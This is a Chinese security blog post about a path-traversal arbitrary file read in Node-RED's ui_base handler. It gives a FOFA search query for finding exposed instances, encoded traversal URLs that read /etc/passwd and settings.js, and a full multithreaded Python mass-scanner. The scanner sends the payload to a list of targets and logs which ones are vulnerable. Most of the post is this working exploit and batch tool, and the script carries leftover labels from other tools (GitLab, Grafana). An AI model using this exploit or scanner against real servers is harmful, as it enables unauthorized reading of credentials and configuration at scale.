Node-RED 任意文件读取

Node-RED 前台任意文件读取

Node-RED 在/nodes/ui_base.js中,URL与’/ui_base/js/*’匹配,然后传递给path.join,
缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js

漏洞复现-Fofa

1
title="Node-RED"

访问页面

验证POC

1
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

读取配置文件

1
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

漏扫工具

批量验证,存在太多了,简单的说

image-20211224091850829

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
import requests
import re
import argparse
import threading
import sys
import urllib3
import ssl
import urllib.request

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()


def banner():
print("""
// /$$$$$$ /$$ /$$ /$$ /$$
// /$$__ $$ | $$ | $$ | $$ | $$
// | $$ \__/ /$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$$ /$$$$$$$
// | $$$$$$ | $$ | $$ | $$ /$$__ $$ /$$__ $$ /$$__ $$ | $$$$$$$$ |____ $$| $$__ $$ /$$__ $$
// \____ $$| $$ | $$ | $$| $$ \ $$| $$ \__/| $$ | $$ | $$__ $$ /$$$$$$$| $$ \ $$| $$ | $$
// /$$ \ $$| $$ | $$ | $$| $$ | $$| $$ | $$ | $$ | $$ | $$ /$$__ $$| $$ | $$| $$ | $$
// | $$$$$$/| $$$$$/$$$$/| $$$$$$/| $$ | $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$| $$$$$$$
// \______/ \_____/\___/ \______/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ \_______/
//
//
//
""")
print('''
Node-RED 任意文件读取 \n
作者:孤桜懶契 \n
fofa 语句:title="Node-RED" \n
批量检测:python3 xxx.py -f/--file target.txt \n
个人博客:gylq.gitee.io \n
公众号:渗透安全团队
''')


# 检查漏洞 存在否
def check(target_url):
scan_url = target_url + "/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
proxy_support = urllib.request.ProxyHandler({
"http": "http://127.0.0.1:8080",
"https": 'http://127.0.0.1:8080'
})
opener = urllib.request.build_opener(proxy_support)
urllib.request.install_opener(opener)
try:
try:
request = urllib.request.urlopen(scan_url)
content = request.read().decode('utf-8')
except:
request = urllib.request.urlopen(scan_url,context = ssl._create_unverified_context())
content = request.read().decode('utf-8')
if 'root:x:0:0:root' in content:
print("[+] 存在任意文件读取漏洞:{}".format(scan_url))
print("[+] Input Content: \n",content)
with open("Node-RED.txt", "a+") as a:
a.write("[+] 存在任意文件读取漏洞:{}\n".format(scan_url))
except:
print("[*] Connect Timeout!")

# scan_url = target_url + "/direct/polling/CommandsPolling.php"
# headers = {
# "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
# "Cookie": "PHPSESSID=014d2705856e1df139772db42ccbaf9f",
# "Content-Length": "47",
# "Cache-Control": "max-age=0",
# "Cookie": "PHPSESSID=014d2705856e1df139772db42ccbaf9f",
# "Sec-Ch-Ua": '"Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"',
# "Sec-Ch-Ua-Mobile": "?0",
# "Upgrade-Insecure-Requests": "1",
# "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36",
# "Content-Type": "application/x-www-form-urlencoded",
# "Connection": "close"
# }
#
# data = {
# "command": "ping",
# "filename": "/etc/passwd",
# "cmdParam": ""
# }
#
# try:
# req = requests.post(url=scan_url, headers=headers, data=data, verify=False, timeout=3)
# if "root" in req.text:
# print("[+] {} 漏洞利用:POST传入command=ping&filename=/etc/passwd".format(scan_url))
# print("[*] result ------------------------------------------------------------------------------------------------------------\n\n", req.text)
# print("[*] ++++++ ------------------------------------------------------------------------------------------------------------\n");
# with open("zhongguan.txt", "a+") as a:
# a.write("[+] 存在任意文件读取漏洞:{} POST传入command=ping&filename=/etc/passwd\n".format(scan_url))
#
# except:
# print("[*] Connect Timeout!")


# 检查 url格式

def format_url(url):
try:
if url[:4] != "http":
url = "https://" + url
url = url.strip()
return url
except Exception as e:
print('URL 错误 {0}'.format(url))


# 主要执行
def main():
parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') # 描述

parser.add_argument('-f', '--file', help='Please Input a url.txt!', default='') # 传入值

args = parser.parse_args() # 解析分解
with open(args.file, "r") as f:
gitlab = f.read().split("\n")
# for url in gitlab:
# target(url,dnslog)
i = 0
# print(len(gitlab) 总长度
while True:
if i < len(gitlab) and threading.active_count() <= 1000: # 50线程
if gitlab[i].strip() != '': # 去掉空格
url_path = format_url(gitlab[i].strip())
url_target = format_url(url_path) # 检查格式
t = threading.Thread(target=check, args=(url_target,))
t.start()
i += 1
print("[*] 剩下数量:", i, "/", len(gitlab))
if i == len(gitlab) and threading.active_count() == 1:
print("[*] done result write in \"grafana.txt\" ! ")
break
f.close()


def remove_duplicates(path):
lines_seen = set()
outfile = open(f"{path}.out", 'a+')
f = open(path, 'r')
for line in f:
if line not in lines_seen:
outfile.write(line)
lines_seen.add(line)
outfile.close()
f.close()


if __name__ == '__main__':
if len(sys.argv) == 1:
banner()
sys.exit()
banner()
main()

本文标题:Node-RED 任意文件读取

文章作者:孤桜懶契

发布时间:2021年12月24日 - 09:10:54

最后更新:2022年05月24日 - 21:00:57

原始链接:http://gylq.gitee.io/time/posts/7.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------